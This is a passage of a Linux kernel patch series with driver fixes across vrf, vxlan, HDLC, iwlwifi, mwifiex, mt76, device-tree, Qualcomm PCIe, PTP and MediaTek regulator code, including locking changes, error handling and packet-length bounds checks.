+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 	nexthop = rt6_nexthop((struct rt6_info *)dst, &ipv6_hdr(skb)->daddr);
+ 	neigh = __ipv6_neigh_lookup_noref(dst->dev, nexthop);
+ 	if (unlikely(!neigh))
+@@ -672,10 +672,10 @@ static int vrf_finish_output6(struct net *net, struct sock *sk,
+ 	if (!IS_ERR(neigh)) {
+ 		sock_confirm_neigh(skb, neigh);
+ 		ret = neigh_output(neigh, skb, false);
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 		return ret;
+ 	}
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 
+ 	IP6_INC_STATS(dev_net(dst->dev),
+ 		      ip6_dst_idev(dst), IPSTATS_MIB_OUTNOROUTES);
+@@ -889,7 +889,7 @@ static int vrf_finish_output(struct net *net, struct sock *sk, struct sk_buff *s
+ 		}
+ 	}
+ 
+-	rcu_read_lock_bh();
++	rcu_read_lock();
+ 
+ 	neigh = ip_neigh_for_gw(rt, skb, &is_v6gw);
+ 	if (!IS_ERR(neigh)) {
+@@ -898,11 +898,11 @@ static int vrf_finish_output(struct net *net, struct sock *sk, struct sk_buff *s
+ 		sock_confirm_neigh(skb, neigh);
+ 		/* if crossing protocols, can not use the cached header */
+ 		ret = neigh_output(neigh, skb, is_v6gw);
+-		rcu_read_unlock_bh();
++		rcu_read_unlock();
+ 		return ret;
+ 	}
+ 
+-	rcu_read_unlock_bh();
++	rcu_read_unlock();
+ 	vrf_tx_error(skb->dev, skb);
+ 	return -EINVAL;
+ }
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index 0c3eb850fcb79..619dd71c9d75e 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -1910,7 +1910,7 @@ static int arp_reduce(struct net_device *dev, struct sk_buff *skb, __be32 vni)
+ 		struct vxlan_fdb *f;
+ 		struct sk_buff	*reply;
+ 
+-		if (!(n->nud_state & NUD_CONNECTED)) {
++		if (!(READ_ONCE(n->nud_state) & NUD_CONNECTED)) {
+ 			neigh_release(n);
+ 			goto out;
+ 		}
+@@ -2074,7 +2074,7 @@ static int neigh_reduce(struct net_device *dev, struct sk_buff *skb, __be32 vni)
+ 		struct vxlan_fdb *f;
+ 		struct sk_buff *reply;
+ 
+-		if (!(n->nud_state & NUD_CONNECTED)) {
++		if (!(READ_ONCE(n->nud_state) & NUD_CONNECTED)) {
+ 			neigh_release(n);
+ 			goto out;
+ 		}
+diff --git a/drivers/net/wan/fsl_ucc_hdlc.c b/drivers/net/wan/fsl_ucc_hdlc.c
+index 1c53b55469270..5fec8abe8e1d3 100644
+--- a/drivers/net/wan/fsl_ucc_hdlc.c
++++ b/drivers/net/wan/fsl_ucc_hdlc.c
+@@ -34,6 +34,8 @@
+ #define TDM_PPPOHT_SLIC_MAXIN
+ #define RX_BD_ERRORS (R_CD_S | R_OV_S | R_CR_S | R_AB_S | R_NO_S | R_LG_S)
+ 
++static int uhdlc_close(struct net_device *dev);
++
+ static struct ucc_tdm_info utdm_primary_info = {
+ 	.uf_info = {
+ 		.tsa = 0,
+@@ -708,6 +710,7 @@ static int uhdlc_open(struct net_device *dev)
+ 	hdlc_device *hdlc = dev_to_hdlc(dev);
+ 	struct ucc_hdlc_private *priv = hdlc->priv;
+ 	struct ucc_tdm *utdm = priv->utdm;
++	int rc = 0;
+ 
+ 	if (priv->hdlc_busy != 1) {
+ 		if (request_irq(priv->ut_info->uf_info.irq,
+@@ -731,10 +734,13 @@ static int uhdlc_open(struct net_device *dev)
+ 		napi_enable(&priv->napi);
+ 		netdev_reset_queue(dev);
+ 		netif_start_queue(dev);
+-		hdlc_open(dev);
++
++		rc = hdlc_open(dev);
++		if (rc)
++			uhdlc_close(dev);
+ 	}
+ 
+-	return 0;
++	return rc;
+ }
+ 
+ static void uhdlc_memclean(struct ucc_hdlc_private *priv)
+@@ -824,6 +830,8 @@ static int uhdlc_close(struct net_device *dev)
+ 	netdev_reset_queue(dev);
+ 	priv->hdlc_busy = 0;
+ 
++	hdlc_close(dev);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/error-dump.h b/drivers/net/wireless/intel/iwlwifi/fw/error-dump.h
+index c62576e442bdf..2d481849a9c23 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/error-dump.h
++++ b/drivers/net/wireless/intel/iwlwifi/fw/error-dump.h
+@@ -295,9 +295,9 @@ struct iwl_fw_ini_fifo_hdr {
+ struct iwl_fw_ini_error_dump_range {
+ 	__le32 range_data_size;
+ 	union {
+-		__le32 internal_base_addr;
+-		__le64 dram_base_addr;
+-		__le32 page_num;
++		__le32 internal_base_addr __packed;
++		__le64 dram_base_addr __packed;
++		__le32 page_num __packed;
+ 		struct iwl_fw_ini_fifo_hdr fifo_hdr;
+ 		struct iwl_cmd_header fw_pkt_hdr;
+ 	};
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+index 887d0789c96c3..2e3c98eaa400c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+@@ -796,7 +796,7 @@ out:
+ 		mvm->nvm_data->bands[0].n_channels = 1;
+ 		mvm->nvm_data->bands[0].n_bitrates = 1;
+ 		mvm->nvm_data->bands[0].bitrates =
+-			(void *)((u8 *)mvm->nvm_data->channels + 1);
++			(void *)(mvm->nvm_data->channels + 1);
+ 		mvm->nvm_data->bands[0].bitrates->hw_value = 10;
+ 	}
+ 
+diff --git a/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c b/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
+index a04b66284af4a..7351acac6932d 100644
+--- a/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
++++ b/drivers/net/wireless/marvell/mwifiex/11n_rxreorder.c
+@@ -965,8 +965,8 @@ void mwifiex_11n_rxba_sync_event(struct mwifiex_private *priv,
+ 			}
+ 		}
+ 
+-		tlv_buf_left -= (sizeof(*tlv_rxba) + tlv_len);
+-		tmp = (u8 *)tlv_rxba + tlv_len + sizeof(*tlv_rxba);
++		tlv_buf_left -= (sizeof(tlv_rxba->header) + tlv_len);
++		tmp = (u8 *)tlv_rxba  + sizeof(tlv_rxba->header) + tlv_len;
+ 		tlv_rxba = (struct mwifiex_ie_types_rxba_sync *)tmp;
+ 	}
+ }
+diff --git a/drivers/net/wireless/marvell/mwifiex/sta_rx.c b/drivers/net/wireless/marvell/mwifiex/sta_rx.c
+index 65420ad674167..257737137cd70 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sta_rx.c
++++ b/drivers/net/wireless/marvell/mwifiex/sta_rx.c
+@@ -86,7 +86,8 @@ int mwifiex_process_rx_packet(struct mwifiex_private *priv,
+ 	rx_pkt_len = le16_to_cpu(local_rx_pd->rx_pkt_length);
+ 	rx_pkt_hdr = (void *)local_rx_pd + rx_pkt_off;
+ 
+-	if (sizeof(*rx_pkt_hdr) + rx_pkt_off > skb->len) {
++	if (sizeof(rx_pkt_hdr->eth803_hdr) + sizeof(rfc1042_header) +
++	    rx_pkt_off > skb->len) {
+ 		mwifiex_dbg(priv->adapter, ERROR,
+ 			    "wrong rx packet offset: len=%d, rx_pkt_off=%d\n",
+ 			    skb->len, rx_pkt_off);
+@@ -95,12 +96,13 @@ int mwifiex_process_rx_packet(struct mwifiex_private *priv,
+ 		return -1;
+ 	}
+ 
+-	if ((!memcmp(&rx_pkt_hdr->rfc1042_hdr, bridge_tunnel_header,
+-		     sizeof(bridge_tunnel_header))) ||
+-	    (!memcmp(&rx_pkt_hdr->rfc1042_hdr, rfc1042_header,
+-		     sizeof(rfc1042_header)) &&
+-	     ntohs(rx_pkt_hdr->rfc1042_hdr.snap_type) != ETH_P_AARP &&
+-	     ntohs(rx_pkt_hdr->rfc1042_hdr.snap_type) != ETH_P_IPX)) {
++	if (sizeof(*rx_pkt_hdr) + rx_pkt_off <= skb->len &&
++	    ((!memcmp(&rx_pkt_hdr->rfc1042_hdr, bridge_tunnel_header,
++		      sizeof(bridge_tunnel_header))) ||
++	     (!memcmp(&rx_pkt_hdr->rfc1042_hdr, rfc1042_header,
++		      sizeof(rfc1042_header)) &&
++	      ntohs(rx_pkt_hdr->rfc1042_hdr.snap_type) != ETH_P_AARP &&
++	      ntohs(rx_pkt_hdr->rfc1042_hdr.snap_type) != ETH_P_IPX))) {
+ 		/*
+ 		 *  Replace the 803 header and rfc1042 header (llc/snap) with an
+ 		 *    EthernetII header, keep the src/dst and snap_type
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x02_eeprom.c b/drivers/net/wireless/mediatek/mt76/mt76x02_eeprom.c
+index 0acabba2d1a50..5d402cf2951cb 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x02_eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x02_eeprom.c
+@@ -131,15 +131,8 @@ u8 mt76x02_get_lna_gain(struct mt76x02_dev *dev,
+ 			s8 *lna_2g, s8 *lna_5g,
+ 			struct ieee80211_channel *chan)
+ {
+-	u16 val;
+ 	u8 lna;
+ 
+-	val = mt76x02_eeprom_get(dev, MT_EE_NIC_CONF_1);
+-	if (val & MT_EE_NIC_CONF_1_LNA_EXT_2G)
+-		*lna_2g = 0;
+-	if (val & MT_EE_NIC_CONF_1_LNA_EXT_5G)
+-		memset(lna_5g, 0, sizeof(s8) * 3);
+-
+ 	if (chan->band == NL80211_BAND_2GHZ)
+ 		lna = *lna_2g;
+ 	else if (chan->hw_value <= 64)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x2/eeprom.c b/drivers/net/wireless/mediatek/mt76/mt76x2/eeprom.c
+index c57e05a5c65e4..91807bf662dde 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x2/eeprom.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x2/eeprom.c
+@@ -256,7 +256,8 @@ void mt76x2_read_rx_gain(struct mt76x02_dev *dev)
+ 	struct ieee80211_channel *chan = dev->mphy.chandef.chan;
+ 	int channel = chan->hw_value;
+ 	s8 lna_5g[3], lna_2g;
+-	u8 lna;
++	bool use_lna;
++	u8 lna = 0;
+ 	u16 val;
+ 
+ 	if (chan->band == NL80211_BAND_2GHZ)
+@@ -275,7 +276,15 @@ void mt76x2_read_rx_gain(struct mt76x02_dev *dev)
+ 	dev->cal.rx.mcu_gain |= (lna_5g[1] & 0xff) << 16;
+ 	dev->cal.rx.mcu_gain |= (lna_5g[2] & 0xff) << 24;
+ 
+-	lna = mt76x02_get_lna_gain(dev, &lna_2g, lna_5g, chan);
++	val = mt76x02_eeprom_get(dev, MT_EE_NIC_CONF_1);
++	if (chan->band == NL80211_BAND_2GHZ)
++		use_lna = !(val & MT_EE_NIC_CONF_1_LNA_EXT_2G);
++	else
++		use_lna = !(val & MT_EE_NIC_CONF_1_LNA_EXT_5G);
++
++	if (use_lna)
++		lna = mt76x02_get_lna_gain(dev, &lna_2g, lna_5g, chan);
++
+ 	dev->cal.rx.lna_gain = mt76x02_sign_extend(lna, 8);
+ }
+ EXPORT_SYMBOL_GPL(mt76x2_read_rx_gain);
+diff --git a/drivers/of/dynamic.c b/drivers/of/dynamic.c
+index 95501b77ef314..0fbf331a748fd 100644
+--- a/drivers/of/dynamic.c
++++ b/drivers/of/dynamic.c
+@@ -902,13 +902,13 @@ int of_changeset_action(struct of_changeset *ocs, unsigned long action,
+ {
+ 	struct of_changeset_entry *ce;
+ 
++	if (WARN_ON(action >= ARRAY_SIZE(action_names)))
++		return -EINVAL;
++
+ 	ce = kzalloc(sizeof(*ce), GFP_KERNEL);
+ 	if (!ce)
+ 		return -ENOMEM;
+ 
+-	if (WARN_ON(action >= ARRAY_SIZE(action_names)))
+-		return -EINVAL;
+-
+ 	/* get a reference to the node */
+ 	ce->action = action;
+ 	ce->np = of_node_get(np);
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index d24712a76ba7c..0ccd92faf078a 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -40,7 +40,6 @@
+ #define PARF_PHY_REFCLK				0x4c
+ #define PARF_CONFIG_BITS			0x50
+ #define PARF_DBI_BASE_ADDR			0x168
+-#define PARF_SLV_ADDR_SPACE_SIZE_2_3_3		0x16c /* Register offset specific to IP ver 2.3.3 */
+ #define PARF_MHI_CLOCK_RESET_CTRL		0x174
+ #define PARF_AXI_MSTR_WR_ADDR_HALT		0x178
+ #define PARF_AXI_MSTR_WR_ADDR_HALT_V2		0x1a8
+@@ -1148,8 +1147,7 @@ static int qcom_pcie_post_init_2_3_3(struct qcom_pcie *pcie)
+ 	u16 offset = dw_pcie_find_capability(pci, PCI_CAP_ID_EXP);
+ 	u32 val;
+ 
+-	writel(SLV_ADDR_SPACE_SZ,
+-		pcie->parf + PARF_SLV_ADDR_SPACE_SIZE_2_3_3);
++	writel(SLV_ADDR_SPACE_SZ, pcie->parf + PARF_SLV_ADDR_SPACE_SIZE);
+ 
+ 	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c
+index a48d9b7d29217..8fee9b330b613 100644
+--- a/drivers/ptp/ptp_ocp.c
++++ b/drivers/ptp/ptp_ocp.c
+@@ -3532,7 +3532,6 @@ ptp_ocp_device_init(struct ptp_ocp *bp, struct pci_dev *pdev)
+ 	return 0;
+ 
+ out:
+-	ptp_ocp_dev_release(&bp->dev);
+ 	put_device(&bp->dev);
+ 	return err;
+ }
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index 351f0fd225b14..f6a95f72af18d 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -5543,6 +5543,8 @@ regulator_register(struct device *dev,
+ 		goto rinse;
+ 	}
+ 	device_initialize(&rdev->dev);
++	dev_set_drvdata(&rdev->dev, rdev);
++	rdev->dev.class = &regulator_class;
+ 	spin_lock_init(&rdev->err_lock);
+ 
+ 	/*
+@@ -5604,11 +5606,9 @@ regulator_register(struct device *dev,
+ 		rdev->supply_name = regulator_desc->supply_name;
+ 
+ 	/* register with sysfs */
+-	rdev->dev.class = &regulator_class;
+ 	rdev->dev.parent = config->dev;
+ 	dev_set_name(&rdev->dev, "regulator.%lu",
+ 		    (unsigned long) atomic_inc_return(&regulator_no));
+-	dev_set_drvdata(&rdev->dev, rdev);
+ 
+ 	/* set regulator constraints */
+ 	if (init_data)
+diff --git a/drivers/regulator/mt6358-regulator.c b/drivers/regulator/mt6358-regulator.c
+index 8a5ce990f1bf9..a0441b8086712 100644
+--- a/drivers/regulator/mt6358-regulator.c
++++ b/drivers/regulator/mt6358-regulator.c
+@@ -35,19 +35,19 @@ struct mt6358_regulator_info {
+ };
+ 
+ #define MT6358_BUCK(match, vreg, min, max, step,		\
+-	volt_ranges, vosel_mask, _da_vsel_reg, _da_vsel_mask,	\
++	vosel_mask, _da_vsel_reg, _da_vsel_mask,	\
+ 	_modeset_reg, _modeset_shift)		\
+ [MT6358_ID_##vreg] = {	\
+ 	.desc = {	\
+ 		.name = #vreg,	\
+ 		.of_match = of_match_ptr(match),	\
+-		.ops = &mt6358_volt_range_ops,	\
++		.ops = &mt6358_buck_ops,	\
+ 		.type = REGULATOR_VOLTAGE,	\
+ 		.id = MT6358_ID_##vreg,		\
+ 		.owner = THIS_MODULE,		\
+ 		.n_voltages = ((max) - (min)) / (step) + 1,	\
+-		.linear_ranges = volt_ranges,		\
+-		.n_linear_ranges = ARRAY_SIZE(volt_ranges),	\
++		.min_uV = (min),		\
++		.uV_step = (step),		\
+ 		.vsel_reg = MT6358_BUCK_##vreg##_ELR0,	\
+ 		.vsel_mask = vosel_mask,	\
+ 		.enable_reg = MT6358_BUCK_##vreg##_CON0,	\
+@@ -87,7 +87,7 @@ struct mt6358_regulator_info {
+ }
+ 
+ #define MT6358_LDO1(match, vreg, min, max, step,	\
+-	volt_ranges, _da_vsel_reg, _da_vsel_mask,	\
++	_da_vsel_reg, _da_vsel_mask,	\
+ 	vosel, vosel_mask)	\
+ [MT6358_ID_##vreg] = {	\
+ 	.desc = {	\
+@@ -98,8 +98,8 @@ struct mt6358_regulator_info {
+ 		.id = MT6358_ID_##vreg,	\
+ 		.owner = THIS_MODULE,	\
+ 		.n_voltages = ((max) - (min)) / (step) + 1,	\
+-		.linear_ranges = volt_ranges,	\
+-		.n_linear_ranges = ARRAY_SIZE(volt_ranges),	\
++		.min_uV = (min),		\
++		.uV_step = (step),		\
+ 		.vsel_reg = vosel,	\
+ 		.vsel_mask = vosel_mask,	\
+ 		.enable_reg = MT6358_LDO_##vreg##_CON0,	\
+@@ -131,19 +131,19 @@ struct mt6358_regulator_info {
+ }
+ 
+ #define MT6366_BUCK(match, vreg, min, max, step,		\
+-	volt_ranges, vosel_mask, _da_vsel_reg, _da_vsel_mask,	\
++	vosel_mask, _da_vsel_reg, _da_vsel_mask,	\
+ 	_modeset_reg, _modeset_shift)		\
+ [MT6366_ID_##vreg] = {	\
+ 	.desc = {	\
+ 		.name = #vreg,	\
+ 		.of_match = of_match_ptr(match),	\
+-		.ops = &mt6358_volt_range_ops,	\
++		.ops = &mt6358_buck_ops,	\
+ 		.type = REGULATOR_VOLTAGE,	\
+ 		.id = MT6366_ID_##vreg,		\
+ 		.owner = THIS_MODULE,		\
+ 		.n_voltages = ((max) - (min)) / (step) + 1,	\
+-		.linear_ranges = volt_ranges,		\
+-		.n_linear_ranges = ARRAY_SIZE(volt_ranges),	\
++		.min_uV = (min),		\
++		.uV_step = (step),		\
+ 		.vsel_reg = MT6358_BUCK_##vreg##_ELR0,	\
+ 		.vsel_mask = vosel_mask,	\
+ 		.enable_reg = MT6358_BUCK_##vreg##_CON0,	\
+@@ -183,7 +183,7 @@ struct mt6358_regulator_info {
+ }
+ 
+ #define MT6366_LDO1(match, vreg, min, max, step,	\
+-	volt_ranges, _da_vsel_reg, _da_vsel_mask,	\
++	_da_vsel_reg, _da_vsel_mask,	\
+ 	vosel, vosel_mask)	\
+ [MT6366_ID_##vreg] = {	\
+ 	.desc = {	\
+@@ -194,8 +194,8 @@ struct mt6358_regulator_info {
+ 		.id = MT6366_ID_##vreg,	\
+ 		.owner = THIS_MODULE,	\
+ 		.n_voltages = ((max) - (min)) / (step) + 1,	\
+-		.linear_ranges = volt_ranges,	\
+-		.n_linear_ranges = ARRAY_SIZE(volt_ranges),	\
++		.min_uV = (min),		\
++		.uV_step = (step),		\
+ 		.vsel_reg = vosel,	\
+ 		.vsel_mask = vosel_mask,	\
+ 		.enable_reg = MT6358_LDO_##vreg##_CON0,	\
+@@ -226,21 +226,6 @@ struct mt6358_regulator_info {
+ 	.qi = BIT(15),							\
+ }
+ 
+-static const struct linear_range buck_volt_range1[] = {
+-	REGULATOR_LINEAR_RANGE(500000, 0, 0x7f, 6250),
+-};
+-
+-static const struct linear_range buck_volt_range2[] = {
+-	REGULATOR_LINEAR_RANGE(500000, 0, 0x7f, 12500),
+-};
+-
+-static const struct linear_range buck_volt_range3[] = {
+-	REGULATOR_LINEAR_RANGE(500000, 0, 0x3f, 50000),
+-};
+-
+-static const struct linear_range buck_volt_range4[] = {
+-	REGULATOR_LINEAR_RANGE(1000000, 0, 0x7f, 12500),
+-};
+ 
+ static const unsigned int vdram2_voltages[] = {
+ 	600000, 1800000,
+@@ -463,9 +448,9 @@ static unsigned int mt6358_regulator_get_mode(struct regulator_dev *rdev)
+ 	}
+ }
+ 
+-static const struct regulator_ops mt6358_volt_range_ops = {
+-	.list_voltage = regulator_list_voltage_linear_range,
+-	.map_voltage = regulator_map_voltage_linear_range,
++static const struct regulator_ops mt6358_buck_ops = {
++	.list_voltage = regulator_list_voltage_linear,
++	.map_voltage = regulator_map_voltage_linear,
+ 	.set_voltage_sel = regulator_set_voltage_sel_regmap,
+ 	.get_voltage_sel = mt6358_get_buck_voltage_sel,
+ 	.set_voltage_time_sel = regulator_set_voltage_time_sel,
+@@ -477,6 +462,18 @@ static const struct regulator_ops mt6358_volt_range_ops = {
+ 	.get_mode = mt6358_regulator_get_mode,
+ };
+ 
++static const struct regulator_ops mt6358_volt_range_ops = {
++	.list_voltage = regulator_list_voltage_linear,
++	.map_voltage = regulator_map_voltage_linear,
++	.set_voltage_sel = regulator_set_voltage_sel_regmap,
++	.get_voltage_sel = mt6358_get_buck_voltage_sel,
++	.set_voltage_time_sel = regulator_set_voltage_time_sel,
++	.enable = regulator_enable_regmap,
++	.disable = regulator_disable_regmap,
++	.is_enabled = regulator_is_enabled_regmap,
++	.get_status = mt6358_get_status,
++};
++
+ static const struct regulator_ops mt6358_volt_table_ops = {
+ 	.list_voltage = regulator_list_voltage_table,
+ 	.map_voltage = regulator_map_voltage_iterate,
+@@ -500,35 +497,23 @@ static const struct regulator_ops mt6358_volt_fixed_ops = {
+ /* The array is indexed by id(MT6358_ID_XXX) */
+ static struct mt6358_regulator_info mt6358_regulators[] = {
+ 	MT6358_BUCK("buck_vdram1", VDRAM1, 500000, 2087500, 12500,
+-		    buck_volt_range2, 0x7f, MT6358_BUCK_VDRAM1_DBG0, 0x7f,
+-		    MT6358_VDRAM1_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VDRAM1_DBG0, 0x7f, MT6358_VDRAM1_ANA_CON0, 8),
+ 	MT6358_BUCK("buck_vcore", VCORE, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VCORE_DBG0, 0x7f,
+-		    MT6358_VCORE_VGPU_ANA_CON0, 1),
+-	MT6358_BUCK("buck_vcore_sshub", VCORE_SSHUB, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VCORE_SSHUB_ELR0, 0x7f,
+-		    MT6358_VCORE_VGPU_ANA_CON0, 1),
++		    0x7f, MT6358_BUCK_VCORE_DBG0, 0x7f, MT6358_VCORE_VGPU_ANA_CON0, 1),
+ 	MT6358_BUCK("buck_vpa", VPA, 500000, 3650000, 50000,
+-		    buck_volt_range3, 0x3f, MT6358_BUCK_VPA_DBG0, 0x3f,
+-		    MT6358_VPA_ANA_CON0, 3),
++		    0x3f, MT6358_BUCK_VPA_DBG0, 0x3f, MT6358_VPA_ANA_CON0, 3),
+ 	MT6358_BUCK("buck_vproc11", VPROC11, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VPROC11_DBG0, 0x7f,
+-		    MT6358_VPROC_ANA_CON0, 1),
++		    0x7f, MT6358_BUCK_VPROC11_DBG0, 0x7f, MT6358_VPROC_ANA_CON0, 1),
+ 	MT6358_BUCK("buck_vproc12", VPROC12, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VPROC12_DBG0, 0x7f,
+-		    MT6358_VPROC_ANA_CON0, 2),
++		    0x7f, MT6358_BUCK_VPROC12_DBG0, 0x7f, MT6358_VPROC_ANA_CON0, 2),
+ 	MT6358_BUCK("buck_vgpu", VGPU, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VGPU_ELR0, 0x7f,
+-		    MT6358_VCORE_VGPU_ANA_CON0, 2),
++		    0x7f, MT6358_BUCK_VGPU_ELR0, 0x7f, MT6358_VCORE_VGPU_ANA_CON0, 2),
+ 	MT6358_BUCK("buck_vs2", VS2, 500000, 2087500, 12500,
+-		    buck_volt_range2, 0x7f, MT6358_BUCK_VS2_DBG0, 0x7f,
+-		    MT6358_VS2_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VS2_DBG0, 0x7f, MT6358_VS2_ANA_CON0, 8),
+ 	MT6358_BUCK("buck_vmodem", VMODEM, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VMODEM_DBG0, 0x7f,
+-		    MT6358_VMODEM_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VMODEM_DBG0, 0x7f, MT6358_VMODEM_ANA_CON0, 8),
+ 	MT6358_BUCK("buck_vs1", VS1, 1000000, 2587500, 12500,
+-		    buck_volt_range4, 0x7f, MT6358_BUCK_VS1_DBG0, 0x7f,
+-		    MT6358_VS1_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VS1_DBG0, 0x7f, MT6358_VS1_ANA_CON0, 8),
+ 	MT6358_REG_FIXED("ldo_vrf12", VRF12,
+ 			 MT6358_LDO_VRF12_CON0, 0, 1200000),
+ 	MT6358_REG_FIXED("ldo_vio18", VIO18,
+@@ -582,55 +567,35 @@ static struct mt6358_regulator_info mt6358_regulators[] = {
+ 	MT6358_LDO("ldo_vsim2", VSIM2, vsim_voltages, vsim_idx,
+ 		   MT6358_LDO_VSIM2_CON0, 0, MT6358_VSIM2_ANA_CON0, 0xf00),
+ 	MT6358_LDO1("ldo_vsram_proc11", VSRAM_PROC11, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_PROC11_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON0, 0x7f),
++		    MT6358_LDO_VSRAM_PROC11_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON0, 0x7f),
+ 	MT6358_LDO1("ldo_vsram_others", VSRAM_OTHERS, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_OTHERS_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON2, 0x7f),
+-	MT6358_LDO1("ldo_vsram_others_sshub", VSRAM_OTHERS_SSHUB, 500000,
+-		    1293750, 6250, buck_volt_range1,
+-		    MT6358_LDO_VSRAM_OTHERS_SSHUB_CON1, 0x7f,
+-		    MT6358_LDO_VSRAM_OTHERS_SSHUB_CON1, 0x7f),
++		    MT6358_LDO_VSRAM_OTHERS_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON2, 0x7f),
+ 	MT6358_LDO1("ldo_vsram_gpu", VSRAM_GPU, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_GPU_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON3, 0x7f),
++		    MT6358_LDO_VSRAM_GPU_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON3, 0x7f),
+ 	MT6358_LDO1("ldo_vsram_proc12", VSRAM_PROC12, 500000, 1293750, 6250,
+-		    buck_volt_range1, MT6358_LDO_VSRAM_PROC12_DBG0, 0x7f00,
+-		    MT6358_LDO_VSRAM_CON1, 0x7f),
++		    MT6358_LDO_VSRAM_PROC12_DBG0, 0x7f00, MT6358_LDO_VSRAM_CON1, 0x7f),
+ };
+ 
+ /* The array is indexed by id(MT6366_ID_XXX) */
+ static struct mt6358_regulator_info mt6366_regulators[] = {
+ 	MT6366_BUCK("buck_vdram1", VDRAM1, 500000, 2087500, 12500,
+-		    buck_volt_range2, 0x7f, MT6358_BUCK_VDRAM1_DBG0, 0x7f,
+-		    MT6358_VDRAM1_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VDRAM1_DBG0, 0x7f, MT6358_VDRAM1_ANA_CON0, 8),
+ 	MT6366_BUCK("buck_vcore", VCORE, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VCORE_DBG0, 0x7f,
+-		    MT6358_VCORE_VGPU_ANA_CON0, 1),
+-	MT6366_BUCK("buck_vcore_sshub", VCORE_SSHUB, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VCORE_SSHUB_ELR0, 0x7f,
+-		    MT6358_VCORE_VGPU_ANA_CON0, 1),
++		    0x7f, MT6358_BUCK_VCORE_DBG0, 0x7f, MT6358_VCORE_VGPU_ANA_CON0, 1),
+ 	MT6366_BUCK("buck_vpa", VPA, 500000, 3650000, 50000,
+-		    buck_volt_range3, 0x3f, MT6358_BUCK_VPA_DBG0, 0x3f,
+-		    MT6358_VPA_ANA_CON0, 3),
++		    0x3f, MT6358_BUCK_VPA_DBG0, 0x3f, MT6358_VPA_ANA_CON0, 3),
+ 	MT6366_BUCK("buck_vproc11", VPROC11, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VPROC11_DBG0, 0x7f,
+-		    MT6358_VPROC_ANA_CON0, 1),
++		    0x7f, MT6358_BUCK_VPROC11_DBG0, 0x7f, MT6358_VPROC_ANA_CON0, 1),
+ 	MT6366_BUCK("buck_vproc12", VPROC12, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VPROC12_DBG0, 0x7f,
+-		    MT6358_VPROC_ANA_CON0, 2),
++		    0x7f, MT6358_BUCK_VPROC12_DBG0, 0x7f, MT6358_VPROC_ANA_CON0, 2),
+ 	MT6366_BUCK("buck_vgpu", VGPU, 500000, 1293750, 6250,
+-		    buck_volt_range1, 0x7f, MT6358_BUCK_VGPU_ELR0, 0x7f,
+-		    MT6358_VCORE_VGPU_ANA_CON0, 2),
++		    0x7f, MT6358_BUCK_VGPU_ELR0, 0x7f, MT6358_VCORE_VGPU_ANA_CON0, 2),
+ 	MT6366_BUCK("buck_vs2", VS2, 500000, 2087500, 12500,
+-		    buck_volt_range2, 0x7f, MT6358_BUCK_VS2_DBG0, 0x7f,
+-		    MT6358_VS2_ANA_CON0, 8),
++		    0x7f, MT6358_BUCK_VS2_DBG0, 0x7f, MT6358_VS2_ANA_CON0, 8),
+ 	MT6366_BUCK("buck_vmodem", VMODEM, 500000, 1293750, 6250,
